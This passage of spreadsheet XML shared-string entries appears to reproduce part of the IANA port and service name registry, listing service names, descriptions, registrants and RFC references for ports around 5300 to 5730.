    <t>Sun MC Group</t>
  </si>
  <si>
    <t>[Michael_DeMoney]</t>
  </si>
  <si>
    <t>sco-aip</t>
  </si>
  <si>
    <t>SCO AIP</t>
  </si>
  <si>
    <t>[Barrie_Cooper]</t>
  </si>
  <si>
    <t>cfengine</t>
  </si>
  <si>
    <t>CFengine</t>
  </si>
  <si>
    <t>[Mark_Burgess]</t>
  </si>
  <si>
    <t>jprinter</t>
  </si>
  <si>
    <t>J Printer</t>
  </si>
  <si>
    <t>[Ken_Blackwell]</t>
  </si>
  <si>
    <t>outlaws</t>
  </si>
  <si>
    <t>Outlaws</t>
  </si>
  <si>
    <t>[Richard_Fife]</t>
  </si>
  <si>
    <t>permabit-cs</t>
  </si>
  <si>
    <t>Permabit Client-Server</t>
  </si>
  <si>
    <t>[Jered_Floyd]</t>
  </si>
  <si>
    <t>rrdp</t>
  </si>
  <si>
    <t>Real-time &amp; Reliable Data</t>
  </si>
  <si>
    <t>[Ted_Hoshi]</t>
  </si>
  <si>
    <t>opalis-rbt-ipc</t>
  </si>
  <si>
    <t>hacl-poll</t>
  </si>
  <si>
    <t>HA Cluster UDP Polling</t>
  </si>
  <si>
    <t>[Hoa_Nguyen]</t>
  </si>
  <si>
    <t>hpbladems</t>
  </si>
  <si>
    <t>HPBladeSystem Monitor Service</t>
  </si>
  <si>
    <t>[Alan_Minchew]</t>
  </si>
  <si>
    <t>hpdevms</t>
  </si>
  <si>
    <t>HP Device Monitor Service</t>
  </si>
  <si>
    <t>pkix-cmc</t>
  </si>
  <si>
    <t>PKIX Certificate Management using CMS (CMC)</t>
  </si>
  <si>
    <t>[RFC6402]</t>
  </si>
  <si>
    <t>bsfserver-zn</t>
  </si>
  <si>
    <t>Webservices-based Zn interface of BSF</t>
  </si>
  <si>
    <t>[Bert_Paul]</t>
  </si>
  <si>
    <t>bsfsvr-zn-ssl</t>
  </si>
  <si>
    <t>Webservices-based Zn interface of BSF over SSL</t>
  </si>
  <si>
    <t>5322-5342</t>
  </si>
  <si>
    <t>kfserver</t>
  </si>
  <si>
    <t>Sculptor Database Server</t>
  </si>
  <si>
    <t>[Keith_Ashman]</t>
  </si>
  <si>
    <t>xkotodrcp</t>
  </si>
  <si>
    <t>xkoto DRCP</t>
  </si>
  <si>
    <t>[Jeff_Heisz]</t>
  </si>
  <si>
    <t>5345-5348</t>
  </si>
  <si>
    <t>stuns</t>
  </si>
  <si>
    <t>STUN over DTLS</t>
  </si>
  <si>
    <t>[RFC7350]</t>
  </si>
  <si>
    <t>This service name was initially created by [RFC5389].</t>
  </si>
  <si>
    <t>turns</t>
  </si>
  <si>
    <t>TURN over TLS</t>
  </si>
  <si>
    <t>TURN over DTLS</t>
  </si>
  <si>
    <t>This service name was initially created by [RFC8656].</t>
  </si>
  <si>
    <t>stun-behaviors</t>
  </si>
  <si>
    <t>STUN Behavior Discovery over TLS</t>
  </si>
  <si>
    <t>Reserved for a future enhancement of STUN-BEHAVIOR</t>
  </si>
  <si>
    <t>pcp-multicast</t>
  </si>
  <si>
    <t>Port Control Protocol Multicast</t>
  </si>
  <si>
    <t>[RFC6887]</t>
  </si>
  <si>
    <t>pcp</t>
  </si>
  <si>
    <t>Port Control Protocol</t>
  </si>
  <si>
    <t>dns-llq</t>
  </si>
  <si>
    <t>DNS Long-Lived Queries</t>
  </si>
  <si>
    <t>[Stuart_Cheshire]</t>
  </si>
  <si>
    <t>[RFC8764]</t>
  </si>
  <si>
    <t>mdns</t>
  </si>
  <si>
    <t>Multicast DNS</t>
  </si>
  <si>
    <t>[RFC6762]</t>
  </si>
  <si>
    <t>mdnsresponder</t>
  </si>
  <si>
    <t>Multicast DNS Responder IPC</t>
  </si>
  <si>
    <t>[Stuart_Cheshire_3]</t>
  </si>
  <si>
    <t>llmnr</t>
  </si>
  <si>
    <t>LLMNR</t>
  </si>
  <si>
    <t>[Bernard_Aboba]</t>
  </si>
  <si>
    <t>ms-smlbiz</t>
  </si>
  <si>
    <t>Microsoft Small Business</t>
  </si>
  <si>
    <t>[Gopikrishna_Sandra]</t>
  </si>
  <si>
    <t>wsdapi</t>
  </si>
  <si>
    <t>Web Services for Devices</t>
  </si>
  <si>
    <t>[Henry_Rawas]</t>
  </si>
  <si>
    <t>wsdapi-s</t>
  </si>
  <si>
    <t>WS for Devices Secured</t>
  </si>
  <si>
    <t>ms-alerter</t>
  </si>
  <si>
    <t>Microsoft Alerter</t>
  </si>
  <si>
    <t>[Marc_McClure]</t>
  </si>
  <si>
    <t>ms-sideshow</t>
  </si>
  <si>
    <t>Protocol for Windows SideShow</t>
  </si>
  <si>
    <t>[Dan_Polivy]</t>
  </si>
  <si>
    <t>ms-s-sideshow</t>
  </si>
  <si>
    <t>Secure Protocol for Windows SideShow</t>
  </si>
  <si>
    <t>serverwsd2</t>
  </si>
  <si>
    <t>Microsoft Windows Server WSD2 Service</t>
  </si>
  <si>
    <t>[Erhan_Soyer_Osman]</t>
  </si>
  <si>
    <t>net-projection</t>
  </si>
  <si>
    <t>Windows Network Projection</t>
  </si>
  <si>
    <t>[Rob_Williams]</t>
  </si>
  <si>
    <t>kdnet</t>
  </si>
  <si>
    <t>Microsoft Kernel Debugger</t>
  </si>
  <si>
    <t>[Microsoft_Corporation_4]</t>
  </si>
  <si>
    <t>[Joe_Ballantyne]</t>
  </si>
  <si>
    <t>5365-5396</t>
  </si>
  <si>
    <t>stresstester</t>
  </si>
  <si>
    <t>StressTester(tm) Injector</t>
  </si>
  <si>
    <t>[Graham_Parsons]</t>
  </si>
  <si>
    <t>elektron-admin</t>
  </si>
  <si>
    <t>Elektron Administration</t>
  </si>
  <si>
    <t>[Chris_Hawk]</t>
  </si>
  <si>
    <t>securitychase</t>
  </si>
  <si>
    <t>SecurityChase</t>
  </si>
  <si>
    <t>[Daisuke_Shinomiya]</t>
  </si>
  <si>
    <t>excerpt</t>
  </si>
  <si>
    <t>Excerpt Search</t>
  </si>
  <si>
    <t>[John_Hinsdale]</t>
  </si>
  <si>
    <t>excerpts</t>
  </si>
  <si>
    <t>Excerpt Search Secure</t>
  </si>
  <si>
    <t>OmniCast MFTP</t>
  </si>
  <si>
    <t>[Steve_Bannister]</t>
  </si>
  <si>
    <t>hpoms-ci-lstn</t>
  </si>
  <si>
    <t>HPOMS-CI-LSTN</t>
  </si>
  <si>
    <t>[Harold_Froehling]</t>
  </si>
  <si>
    <t>hpoms-dps-lstn</t>
  </si>
  <si>
    <t>HPOMS-DPS-LSTN</t>
  </si>
  <si>
    <t>netsupport</t>
  </si>
  <si>
    <t>NetSupport</t>
  </si>
  <si>
    <t>[Paul_Sanders_2]</t>
  </si>
  <si>
    <t>systemics-sox</t>
  </si>
  <si>
    <t>Systemics Sox</t>
  </si>
  <si>
    <t>foresyte-clear</t>
  </si>
  <si>
    <t>Foresyte-Clear</t>
  </si>
  <si>
    <t>[Jorge_Aldana]</t>
  </si>
  <si>
    <t>foresyte-sec</t>
  </si>
  <si>
    <t>Foresyte-Sec</t>
  </si>
  <si>
    <t>salient-dtasrv</t>
  </si>
  <si>
    <t>Salient Data Server</t>
  </si>
  <si>
    <t>[Richard_Farnham]</t>
  </si>
  <si>
    <t>salient-usrmgr</t>
  </si>
  <si>
    <t>Salient User Manager</t>
  </si>
  <si>
    <t>actnet</t>
  </si>
  <si>
    <t>ActNet</t>
  </si>
  <si>
    <t>[Simon_Robillard]</t>
  </si>
  <si>
    <t>continuus</t>
  </si>
  <si>
    <t>Continuus</t>
  </si>
  <si>
    <t>[Steven_Holtsberg]</t>
  </si>
  <si>
    <t>wwiotalk</t>
  </si>
  <si>
    <t>WWIOTALK</t>
  </si>
  <si>
    <t>[Roger_Knobbe]</t>
  </si>
  <si>
    <t>statusd</t>
  </si>
  <si>
    <t>StatusD</t>
  </si>
  <si>
    <t>[Stephen_Misel_2]</t>
  </si>
  <si>
    <t>ns-server</t>
  </si>
  <si>
    <t>NS Server</t>
  </si>
  <si>
    <t>[Jeffrey_Chiao]</t>
  </si>
  <si>
    <t>sns-gateway</t>
  </si>
  <si>
    <t>SNS Gateway</t>
  </si>
  <si>
    <t>[Mary_Holstage]</t>
  </si>
  <si>
    <t>sns-agent</t>
  </si>
  <si>
    <t>SNS Agent</t>
  </si>
  <si>
    <t>mcntp</t>
  </si>
  <si>
    <t>MCNTP</t>
  </si>
  <si>
    <t>[Heiko_Rupp]</t>
  </si>
  <si>
    <t>dj-ice</t>
  </si>
  <si>
    <t>DJ-ICE</t>
  </si>
  <si>
    <t>[Don_Tyson_2]</t>
  </si>
  <si>
    <t>cylink-c</t>
  </si>
  <si>
    <t>Cylink-C</t>
  </si>
  <si>
    <t>[John_Jobe]</t>
  </si>
  <si>
    <t>netsupport2</t>
  </si>
  <si>
    <t>Net Support 2</t>
  </si>
  <si>
    <t>salient-mux</t>
  </si>
  <si>
    <t>Salient MUX</t>
  </si>
  <si>
    <t>virtualuser</t>
  </si>
  <si>
    <t>VIRTUALUSER</t>
  </si>
  <si>
    <t>[Chad_Williams]</t>
  </si>
  <si>
    <t>beyond-remote</t>
  </si>
  <si>
    <t>Beyond Remote</t>
  </si>
  <si>
    <t>[Michael_Berg]</t>
  </si>
  <si>
    <t>br-channel</t>
  </si>
  <si>
    <t>Beyond Remote Command Channel</t>
  </si>
  <si>
    <t>devbasic</t>
  </si>
  <si>
    <t>DEVBASIC</t>
  </si>
  <si>
    <t>[Curtis_Smith]</t>
  </si>
  <si>
    <t>sco-peer-tta</t>
  </si>
  <si>
    <t>SCO-PEER-TTA</t>
  </si>
  <si>
    <t>[Andrew_Shire]</t>
  </si>
  <si>
    <t>telaconsole</t>
  </si>
  <si>
    <t>TELACONSOLE</t>
  </si>
  <si>
    <t>[Joseph_M_Newcomer]</t>
  </si>
  <si>
    <t>base</t>
  </si>
  <si>
    <t>Billing and Accounting System Exchange</t>
  </si>
  <si>
    <t>[Odo_Maletzki]</t>
  </si>
  <si>
    <t>radec-corp</t>
  </si>
  <si>
    <t>RADEC CORP</t>
  </si>
  <si>
    <t>[David_Chell]</t>
  </si>
  <si>
    <t>park-agent</t>
  </si>
  <si>
    <t>PARK AGENT</t>
  </si>
  <si>
    <t>[John_Clifford]</t>
  </si>
  <si>
    <t>postgresql</t>
  </si>
  <si>
    <t>PostgreSQL Database</t>
  </si>
  <si>
    <t>[Tom_Lane]</t>
  </si>
  <si>
    <t>pyrrho</t>
  </si>
  <si>
    <t>Pyrrho DBMS</t>
  </si>
  <si>
    <t>[Malcolm_Crowe]</t>
  </si>
  <si>
    <t>sgi-arrayd</t>
  </si>
  <si>
    <t>SGI Array Services Daemon</t>
  </si>
  <si>
    <t>[Karl_Feind]</t>
  </si>
  <si>
    <t>2005-10</t>
  </si>
  <si>
    <t>sceanics</t>
  </si>
  <si>
    <t>SCEANICS situation and action notification</t>
  </si>
  <si>
    <t>[Richard_Olsen]</t>
  </si>
  <si>
    <t>pmip6-cntl</t>
  </si>
  <si>
    <t>[RFC5844]</t>
  </si>
  <si>
    <t>pmip6-data</t>
  </si>
  <si>
    <t>5438-5442</t>
  </si>
  <si>
    <t>spss</t>
  </si>
  <si>
    <t>Pearson HTTPS</t>
  </si>
  <si>
    <t>[Pearson]</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE: Port 5444</t>
  </si>
  <si>
    <t>smbdirect</t>
  </si>
  <si>
    <t>Server Message Block over Remote Direct Memory Access</t>
  </si>
  <si>
    <t>[Microsoft_Corporation_2]</t>
  </si>
  <si>
    <t>[Tom_Talpey]</t>
  </si>
  <si>
    <t>5446-5449</t>
  </si>
  <si>
    <t>tiepie</t>
  </si>
  <si>
    <t>TiePie engineering data acquisition</t>
  </si>
  <si>
    <t>[TiePie_engineering]</t>
  </si>
  <si>
    <t>[Reinder_Feenstra]</t>
  </si>
  <si>
    <t>tiepie-disc</t>
  </si>
  <si>
    <t>TiePie engineering data acquisition (discovery)</t>
  </si>
  <si>
    <t>5451-5452</t>
  </si>
  <si>
    <t>surebox</t>
  </si>
  <si>
    <t>SureBox</t>
  </si>
  <si>
    <t>[Emin_BORU]</t>
  </si>
  <si>
    <t>apc-5454</t>
  </si>
  <si>
    <t>APC 5454</t>
  </si>
  <si>
    <t>apc-5455</t>
  </si>
  <si>
    <t>APC 5455</t>
  </si>
  <si>
    <t>apc-5456</t>
  </si>
  <si>
    <t>APC 5456</t>
  </si>
  <si>
    <t>5457-5460</t>
  </si>
  <si>
    <t>silkmeter</t>
  </si>
  <si>
    <t>SILKMETER</t>
  </si>
  <si>
    <t>[Klaus_Fellner]</t>
  </si>
  <si>
    <t>ttl-publisher</t>
  </si>
  <si>
    <t>TTL Publisher</t>
  </si>
  <si>
    <t>[Peter_Jacobs]</t>
  </si>
  <si>
    <t>ttlpriceproxy</t>
  </si>
  <si>
    <t>TTL Price Proxy</t>
  </si>
  <si>
    <t>quailnet</t>
  </si>
  <si>
    <t>Quail Networks Object Broker</t>
  </si>
  <si>
    <t>[Craig_N_Bissell]</t>
  </si>
  <si>
    <t>netops-broker</t>
  </si>
  <si>
    <t>NETOPS-BROKER</t>
  </si>
  <si>
    <t>[John_R_Deuel]</t>
  </si>
  <si>
    <t>5466-5469</t>
  </si>
  <si>
    <t>apsolab-col</t>
  </si>
  <si>
    <t>The Apsolab company's data collection protocol (native api)</t>
  </si>
  <si>
    <t>[Apsolab_Inc]</t>
  </si>
  <si>
    <t>[Jean-Francois_Gauthier]</t>
  </si>
  <si>
    <t>apsolab-cols</t>
  </si>
  <si>
    <t>The Apsolab company's secure data collection protocol (native api)</t>
  </si>
  <si>
    <t>apsolab-tag</t>
  </si>
  <si>
    <t>The Apsolab company's dynamic tag protocol</t>
  </si>
  <si>
    <t>apsolab-tags</t>
  </si>
  <si>
    <t>The Apsolab company's secure dynamic tag protocol</t>
  </si>
  <si>
    <t>apsolab-rpc</t>
  </si>
  <si>
    <t>The Apsolab company's status query protocol</t>
  </si>
  <si>
    <t>apsolab-data</t>
  </si>
  <si>
    <t>The Apsolab company's data retrieval protocol</t>
  </si>
  <si>
    <t>5476-5499</t>
  </si>
  <si>
    <t>fcp-addr-srvr1</t>
  </si>
  <si>
    <t>[Ken_Wittmer]</t>
  </si>
  <si>
    <t>fcp-addr-srvr2</t>
  </si>
  <si>
    <t>fcp-srvr-inst1</t>
  </si>
  <si>
    <t>fcp-srvr-inst2</t>
  </si>
  <si>
    <t>fcp-cics-gw1</t>
  </si>
  <si>
    <t>checkoutdb</t>
  </si>
  <si>
    <t>Checkout Database</t>
  </si>
  <si>
    <t>[Dirk_Stoop]</t>
  </si>
  <si>
    <t>amc</t>
  </si>
  <si>
    <t>Amcom Mobile Connect</t>
  </si>
  <si>
    <t>[Aaron_Fracht_Monroe]</t>
  </si>
  <si>
    <t>psl-management</t>
  </si>
  <si>
    <t>PowerSysLab Electrical Management</t>
  </si>
  <si>
    <t>[PowerSysLab]</t>
  </si>
  <si>
    <t>[Lucas_Lorensi]</t>
  </si>
  <si>
    <t>5508-5549</t>
  </si>
  <si>
    <t>cbus</t>
  </si>
  <si>
    <t>Model Railway control using the CBUS message protocol</t>
  </si>
  <si>
    <t>[MERG]</t>
  </si>
  <si>
    <t>[Pete_Brownlow]</t>
  </si>
  <si>
    <t>5551-5552</t>
  </si>
  <si>
    <t>sgi-eventmond</t>
  </si>
  <si>
    <t>SGI Eventmond Port</t>
  </si>
  <si>
    <t>[Andrei_Vilkotski]</t>
  </si>
  <si>
    <t>sgi-esphttp</t>
  </si>
  <si>
    <t>SGI ESP HTTP</t>
  </si>
  <si>
    <t>[Vladimir_Legalov]</t>
  </si>
  <si>
    <t>personal-agent</t>
  </si>
  <si>
    <t>Personal Agent</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USEs on port 5555</t>
  </si>
  <si>
    <t>freeciv</t>
  </si>
  <si>
    <t>Freeciv gameplay</t>
  </si>
  <si>
    <t>[Reinier_Post_and_Pau]</t>
  </si>
  <si>
    <t>Known Unauthorized Use on port 5556</t>
  </si>
  <si>
    <t>farenet</t>
  </si>
  <si>
    <t>Sandlab FARENET</t>
  </si>
  <si>
    <t>[Kay_T_Labinsky]</t>
  </si>
  <si>
    <t>5558-5564</t>
  </si>
  <si>
    <t>dp-bura</t>
  </si>
  <si>
    <t>Data Protector BURA</t>
  </si>
  <si>
    <t>westec-connect</t>
  </si>
  <si>
    <t>Westec Connect</t>
  </si>
  <si>
    <t>[Jon_Bolen]</t>
  </si>
  <si>
    <t>dof-dps-mc-sec</t>
  </si>
  <si>
    <t>DOF Protocol Stack Multicast/Secure Transport</t>
  </si>
  <si>
    <t>sdt</t>
  </si>
  <si>
    <t>Session Data Transport Multicast</t>
  </si>
  <si>
    <t>[Daniel_W_Antonuk]</t>
  </si>
  <si>
    <t>rdmnet-ctrl</t>
  </si>
  <si>
    <t>PLASA E1.33, Remote Device Management (RDM) controller status notifications</t>
  </si>
  <si>
    <t>[PLASA]</t>
  </si>
  <si>
    <t>[Simon_Newton]</t>
  </si>
  <si>
    <t>rdmnet-device</t>
  </si>
  <si>
    <t>PLASA E1.33, Remote Device Management (RDM) messages</t>
  </si>
  <si>
    <t>5570-5572</t>
  </si>
  <si>
    <t>Known UNAUTHORIZED USE on Port 5570</t>
  </si>
  <si>
    <t>sdmmp</t>
  </si>
  <si>
    <t>SAS Domain Management Messaging Protocol</t>
  </si>
  <si>
    <t>[Ron_Zuckerman]</t>
  </si>
  <si>
    <t>lsi-bobcat</t>
  </si>
  <si>
    <t>SAS IO Forwarding</t>
  </si>
  <si>
    <t>[Mandar_Joshi]</t>
  </si>
  <si>
    <t>ora-oap</t>
  </si>
  <si>
    <t>Oracle Access Protocol</t>
  </si>
  <si>
    <t>[Peter_Povinec]</t>
  </si>
  <si>
    <t>5576-5578</t>
  </si>
  <si>
    <t>fdtracks</t>
  </si>
  <si>
    <t>FleetDisplay Tracking Service</t>
  </si>
  <si>
    <t>[Henrik_Woffinden]</t>
  </si>
  <si>
    <t>tmosms0</t>
  </si>
  <si>
    <t>T-Mobile SMS Protocol Message 0</t>
  </si>
  <si>
    <t>[Ezinne_Oji]</t>
  </si>
  <si>
    <t>tmosms1</t>
  </si>
  <si>
    <t>T-Mobile SMS Protocol Message 1</t>
  </si>
  <si>
    <t>fac-restore</t>
  </si>
  <si>
    <t>T-Mobile SMS Protocol Message 3</t>
  </si>
  <si>
    <t>[Jessica_Yan]</t>
  </si>
  <si>
    <t>tmo-icon-sync</t>
  </si>
  <si>
    <t>T-Mobile SMS Protocol Message 2</t>
  </si>
  <si>
    <t>[Donghwan_Lim]</t>
  </si>
  <si>
    <t>bis-web</t>
  </si>
  <si>
    <t>BeInSync-Web</t>
  </si>
  <si>
    <t>[Adi_Ruppin]</t>
  </si>
  <si>
    <t>bis-sync</t>
  </si>
  <si>
    <t>BeInSync-sync</t>
  </si>
  <si>
    <t>att-mt-sms</t>
  </si>
  <si>
    <t>Planning to send mobile terminated SMS to the specific port so that the SMS is not visible to the client</t>
  </si>
  <si>
    <t>[ATT]</t>
  </si>
  <si>
    <t>[Dhillesh_Sigilipelli]</t>
  </si>
  <si>
    <t>5587-5596</t>
  </si>
  <si>
    <t>ininmessaging</t>
  </si>
  <si>
    <t>inin secure messaging</t>
  </si>
  <si>
    <t>mctfeed</t>
  </si>
  <si>
    <t>MCT Market Data Feed</t>
  </si>
  <si>
    <t>[Stephane_Touizer]</t>
  </si>
  <si>
    <t>esinstall</t>
  </si>
  <si>
    <t>Enterprise Security Remote Install</t>
  </si>
  <si>
    <t>[Kimberly_Gibbs]</t>
  </si>
  <si>
    <t>esmmanager</t>
  </si>
  <si>
    <t>Enterprise Security Manager</t>
  </si>
  <si>
    <t>esmagent</t>
  </si>
  <si>
    <t>Enterprise Security Agent</t>
  </si>
  <si>
    <t>a1-msc</t>
  </si>
  <si>
    <t>A1-MSC</t>
  </si>
  <si>
    <t>[Mike_Dolan]</t>
  </si>
  <si>
    <t>a1-bs</t>
  </si>
  <si>
    <t>A1-BS</t>
  </si>
  <si>
    <t>a3-sdunode</t>
  </si>
  <si>
    <t>A3-SDUNode</t>
  </si>
  <si>
    <t>a4-sdunode</t>
  </si>
  <si>
    <t>A4-SDUNode</t>
  </si>
  <si>
    <t>5606-5617</t>
  </si>
  <si>
    <t>efr</t>
  </si>
  <si>
    <t>Fiscal Registering Protocol</t>
  </si>
  <si>
    <t>[efsta]</t>
  </si>
  <si>
    <t>[Alois_Reisinger]</t>
  </si>
  <si>
    <t>5619-5626</t>
  </si>
  <si>
    <t>ninaf</t>
  </si>
  <si>
    <t>Node Initiated Network Association Forma</t>
  </si>
  <si>
    <t>[Thomas_Scholl]</t>
  </si>
  <si>
    <t>htrust</t>
  </si>
  <si>
    <t>HTrust API</t>
  </si>
  <si>
    <t>[Karl_Olafsson]</t>
  </si>
  <si>
    <t>symantec-sfdb</t>
  </si>
  <si>
    <t>Symantec Storage Foundation for Database</t>
  </si>
  <si>
    <t>[Quang_Thoi]</t>
  </si>
  <si>
    <t>precise-comm</t>
  </si>
  <si>
    <t>PreciseCommunication</t>
  </si>
  <si>
    <t>[Alon_Tamir]</t>
  </si>
  <si>
    <t>pcanywheredata</t>
  </si>
  <si>
    <t>pcANYWHEREdata</t>
  </si>
  <si>
    <t>[Jon_Rosarky]</t>
  </si>
  <si>
    <t>pcanywherestat</t>
  </si>
  <si>
    <t>pcANYWHEREstat</t>
  </si>
  <si>
    <t>beorl</t>
  </si>
  <si>
    <t>BE Operations Request Listener</t>
  </si>
  <si>
    <t>[Chirag_Desai]</t>
  </si>
  <si>
    <t>xprtld</t>
  </si>
  <si>
    <t>SF Message Service</t>
  </si>
  <si>
    <t>[VR_Satish]</t>
  </si>
  <si>
    <t>sfmsso</t>
  </si>
  <si>
    <t>SFM Authentication Subsystem</t>
  </si>
  <si>
    <t>[De_Chih_Chien]</t>
  </si>
  <si>
    <t>sfm-db-server</t>
  </si>
  <si>
    <t>SFMdb - SFM DB server</t>
  </si>
  <si>
    <t>cssc</t>
  </si>
  <si>
    <t>Symantec CSSC</t>
  </si>
  <si>
    <t>[Amol_P_Tambe]</t>
  </si>
  <si>
    <t>flcrs</t>
  </si>
  <si>
    <t>Symantec Fingerprint Lookup and Container Reference Service</t>
  </si>
  <si>
    <t>[Symantec_Corp]</t>
  </si>
  <si>
    <t>[Neel_A_Bhatt]</t>
  </si>
  <si>
    <t>ics</t>
  </si>
  <si>
    <t>Symantec Integrity Checking Service</t>
  </si>
  <si>
    <t>[Symantec_Corp2]</t>
  </si>
  <si>
    <t>[Danzhou_Liu]</t>
  </si>
  <si>
    <t>5640-5645</t>
  </si>
  <si>
    <t>vfmobile</t>
  </si>
  <si>
    <t>Ventureforth Mobile</t>
  </si>
  <si>
    <t>[Ventureforth_Inc]</t>
  </si>
  <si>
    <t>[Blakely_Snyder]</t>
  </si>
  <si>
    <t>5647-5665</t>
  </si>
  <si>
    <t>nrpe</t>
  </si>
  <si>
    <t>Nagios Remote Plugin Executor</t>
  </si>
  <si>
    <t>[Nagios_Enterprises_LLC]</t>
  </si>
  <si>
    <t>[Bryan_Heden]</t>
  </si>
  <si>
    <t>5667-5669</t>
  </si>
  <si>
    <t>filemq</t>
  </si>
  <si>
    <t>ZeroMQ file publish-subscribe protocol</t>
  </si>
  <si>
    <t>[Pieter_Hintjens2]</t>
  </si>
  <si>
    <t>zre-disc</t>
  </si>
  <si>
    <t>Local area discovery and messaging over ZeroMQ</t>
  </si>
  <si>
    <t>[Pieter_Hintjens_3]</t>
  </si>
  <si>
    <t>amqps</t>
  </si>
  <si>
    <t>amqp protocol over TLS/SSL</t>
  </si>
  <si>
    <t>[Ted_Ross_2]</t>
  </si>
  <si>
    <t>amqp</t>
  </si>
  <si>
    <t>AMQP</t>
  </si>
  <si>
    <t>[Pieter_Hintjens]</t>
  </si>
  <si>
    <t>[Martin_Sustrik]</t>
  </si>
  <si>
    <t>jms</t>
  </si>
  <si>
    <t>JACL Message Server</t>
  </si>
  <si>
    <t>[Stuart_Allen]</t>
  </si>
  <si>
    <t>hyperscsi-port</t>
  </si>
  <si>
    <t>HyperSCSI Port</t>
  </si>
  <si>
    <t>[Data_Storage_Institu]</t>
  </si>
  <si>
    <t>v5ua</t>
  </si>
  <si>
    <t>V5UA application port</t>
  </si>
  <si>
    <t>[RFC3807]</t>
  </si>
  <si>
    <t>raadmin</t>
  </si>
  <si>
    <t>RA Administration</t>
  </si>
  <si>
    <t>[Sergei_Zjaikin]</t>
  </si>
  <si>
    <t>questdb2-lnchr</t>
  </si>
  <si>
    <t>Quest Central DB2 Launchr</t>
  </si>
  <si>
    <t>[Robert_M_Mackowiak]</t>
  </si>
  <si>
    <t>rrac</t>
  </si>
  <si>
    <t>Remote Replication Agent Connection</t>
  </si>
  <si>
    <t>dccm</t>
  </si>
  <si>
    <t>Direct Cable Connect Manager</t>
  </si>
  <si>
    <t>[Mark_Miller_2]</t>
  </si>
  <si>
    <t>auriga-router</t>
  </si>
  <si>
    <t>Auriga Router Service</t>
  </si>
  <si>
    <t>[Vincent_Gaudeul]</t>
  </si>
  <si>
    <t>ncxcp</t>
  </si>
  <si>
    <t>Net-coneX Control Protocol</t>
  </si>
  <si>
    <t>[Ryan_Werber]</t>
  </si>
  <si>
    <t>brightcore</t>
  </si>
  <si>
    <t>BrightCore control &amp; data transfer exchange</t>
  </si>
  <si>
    <t>[Marko_Bjelac]</t>
  </si>
  <si>
    <t>coap</t>
  </si>
  <si>
    <t>Constrained Application Protocol (CoAP)</t>
  </si>
  <si>
    <t>[RFC8323]</t>
  </si>
  <si>
    <t>Constrained Application Protocol</t>
  </si>
  <si>
    <t>[RFC7252]</t>
  </si>
  <si>
    <t>coaps</t>
  </si>
  <si>
    <t>[RFC7301][RFC8323]</t>
  </si>
  <si>
    <t>DTLS-secured CoAP</t>
  </si>
  <si>
    <t>5685-5686</t>
  </si>
  <si>
    <t>gog-multiplayer</t>
  </si>
  <si>
    <t>GOG multiplayer game protocol</t>
  </si>
  <si>
    <t>[GOG.com]</t>
  </si>
  <si>
    <t>[Michal_Gruchala]</t>
  </si>
  <si>
    <t>ggz</t>
  </si>
  <si>
    <t>GGZ Gaming Zone</t>
  </si>
  <si>
    <t>[Josef_Spillner]</t>
  </si>
  <si>
    <t>qmvideo</t>
  </si>
  <si>
    <t>QM video network management protocol</t>
  </si>
  <si>
    <t>[Jamie_Lokier]</t>
  </si>
  <si>
    <t>5690-5692</t>
  </si>
  <si>
    <t>rbsystem</t>
  </si>
  <si>
    <t>Robert Bosch Data Transfer</t>
  </si>
  <si>
    <t>[Syntegon_Technology_GmbH]</t>
  </si>
  <si>
    <t>[Klaus_Warth]</t>
  </si>
  <si>
    <t>5694-5695</t>
  </si>
  <si>
    <t>kmip</t>
  </si>
  <si>
    <t>Key Management Interoperability Protocol</t>
  </si>
  <si>
    <t>[OASIS_KMIP_Technical_Committee]</t>
  </si>
  <si>
    <t>5697-5699</t>
  </si>
  <si>
    <t>supportassist</t>
  </si>
  <si>
    <t>Dell SupportAssist data center management</t>
  </si>
  <si>
    <t>[Dell_Technologies]</t>
  </si>
  <si>
    <t>[Rohitdev_Kulshrestha]</t>
  </si>
  <si>
    <t>5701-5704</t>
  </si>
  <si>
    <t>storageos</t>
  </si>
  <si>
    <t>StorageOS REST API</t>
  </si>
  <si>
    <t>[StorageOS]</t>
  </si>
  <si>
    <t>[Simon_Croome]</t>
  </si>
  <si>
    <t>5706-5712</t>
  </si>
  <si>
    <t>proshareaudio</t>
  </si>
  <si>
    <t>proshare conf audio</t>
  </si>
  <si>
    <t>[gunner]</t>
  </si>
  <si>
    <t>prosharevideo</t>
  </si>
  <si>
    <t>proshare conf video</t>
  </si>
  <si>
    <t>prosharedata</t>
  </si>
  <si>
    <t>proshare conf data</t>
  </si>
  <si>
    <t>prosharerequest</t>
  </si>
  <si>
    <t>proshare conf request</t>
  </si>
  <si>
    <t>prosharenotify</t>
  </si>
  <si>
    <t>proshare conf notify</t>
  </si>
  <si>
    <t>dpm</t>
  </si>
  <si>
    <t>DPM Communication Server</t>
  </si>
  <si>
    <t>[Sundar_Srinivasan][Vinay_Badami]</t>
  </si>
  <si>
    <t>dpm-agent</t>
  </si>
  <si>
    <t>DPM Agent Coordinator</t>
  </si>
  <si>
    <t>ms-licensing</t>
  </si>
  <si>
    <t>MS-Licensing</t>
  </si>
  <si>
    <t>[Thomas_Lindeman]</t>
  </si>
  <si>
    <t>dtpt</t>
  </si>
  <si>
    <t>Desktop Passthru Service</t>
  </si>
  <si>
    <t>[Dan_Leising]</t>
  </si>
  <si>
    <t>msdfsr</t>
  </si>
  <si>
    <t>Microsoft DFS Replication Service</t>
  </si>
  <si>
    <t>[Guhan_Suriyanarayana]</t>
  </si>
  <si>
    <t>omhs</t>
  </si>
  <si>
    <t>Operations Manager - Health Service</t>
  </si>
  <si>
    <t>[Gerardo_Dilillo]</t>
  </si>
  <si>
    <t>omsdk</t>
  </si>
  <si>
    <t>Operations Manager - SDK Service</t>
  </si>
  <si>
    <t>ms-ilm</t>
  </si>
  <si>
    <t>Microsoft Identity Lifecycle Manager</t>
  </si>
  <si>
    <t>[Rob_Ward]</t>
  </si>
  <si>
    <t>ms-ilm-sts</t>
  </si>
  <si>
    <t>Microsoft Lifecycle Manager Secure Token Service</t>
  </si>
  <si>
    <t>asgenf</t>
  </si>
  <si>
    <t>ASG Event Notification Framework</t>
  </si>
  <si>
    <t>[Arman_Bedonian]</t>
  </si>
  <si>
    <t>io-dist-data</t>
  </si>
  <si>
    <t>Dist. I/O Comm. Service Data and Control</t>
  </si>
  <si>
    <t>[Harish_Kuttan]</t>
  </si>
  <si>
    <t>io-dist-group</t>
  </si>
  <si>
    <t>Dist. I/O Comm. Service Group Membership</t>
  </si>
